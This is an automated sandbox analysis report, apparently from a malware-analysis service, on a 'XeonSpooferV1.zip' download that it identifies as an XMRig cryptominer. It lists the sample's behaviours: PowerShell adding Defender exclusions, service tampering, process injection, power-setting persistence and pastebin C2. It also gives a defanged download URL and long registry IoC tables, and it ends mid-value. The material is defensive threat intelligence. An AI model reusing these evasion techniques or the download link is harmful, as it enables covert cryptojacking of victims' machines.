xmrig | hxxp://mediafire[.]com/file/ujhp1i716ubbtsg/XeonSpooferV1[.]zip/file

Analysis

max time kernel
563s
max time network
566s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
18-12-2024 14:13

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

http://mediafire.com/file/ujhp1i716ubbtsg/XeonSpooferV1.zip/file

Score

10^/10

xmrig defense_evasion discovery evasion execution miner persistence pyinstaller upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 5612 created 648	5612	powershell.EXE	5
PID 5748 created 648	5748	powershell.EXE	5

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/memory/2416-1537-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2416-1538-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2416-1536-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2416-1535-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2416-1534-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2416-1530-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2416-1531-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2452	powershell.exe
5852	powershell.exe
5612	powershell.EXE
5748	powershell.EXE

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 4 IoCs

pid	Process
3476	Root + 2 Minute Start Delay.exe
5080	xeon.exe
5976	xeon.exe
4944	bsulumhydtcf.exe

Loads dropped DLL 13 IoCs

pid	Process
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe
5976	xeon.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
15	pastebin.com
99	pastebin.com
1	mediafire.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3112	powercfg.exe
4400	powercfg.exe
6072	powercfg.exe
1152	powercfg.exe
4396	powercfg.exe
4536	powercfg.exe
5988	powercfg.exe
3116	powercfg.exe

Drops file in System32 directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	Root + 2 Minute Start Delay.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	bsulumhydtcf.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\dialersvc64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3476 set thread context of 1980	3476	Root + 2 Minute Start Delay.exe	123
PID 4944 set thread context of 6056	4944	bsulumhydtcf.exe	148
PID 4944 set thread context of 1192	4944	bsulumhydtcf.exe	152
PID 4944 set thread context of 2416	4944	bsulumhydtcf.exe	153
PID 5612 set thread context of 3704	5612	powershell.EXE	155
PID 5748 set thread context of 2136	5748	powershell.EXE	159

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2416-1525-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1537-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1538-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1536-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1535-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1534-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1530-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1528-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1527-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1531-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1529-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2416-1524-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3328	sc.exe
1296	sc.exe
4952	sc.exe
3712	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001900000002b01b-425.dat	pyinstaller

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XeonSpoofer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000000a343014af18db01a3908e9fb618db01da0038945751db0114000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "250"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133727754256483455"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "600"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000000000001000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 = 70003200a74c670292592372200058454f4e53507e312e5a49500000540009000400efbe92590e72925923722e0000000000000000000000000000000000000000000000000002bc6400580065006f006e00530070006f006f00660065007200560031002e007a006900700000001c000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874385"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "302"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 = 820074001c004346534616003100000000004759495e120041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe4759495e9259f1712e000000345702000000010000000000000000000000000000001b5946004100700070004400610074006100000042000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "72"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1076"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0 = 50003100000000004759a56010004c6f63616c003c0009000400efbe4759495e9259f1712e000000485702000000010000000000000000000000000000007dc240004c006f00630061006c00000014000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000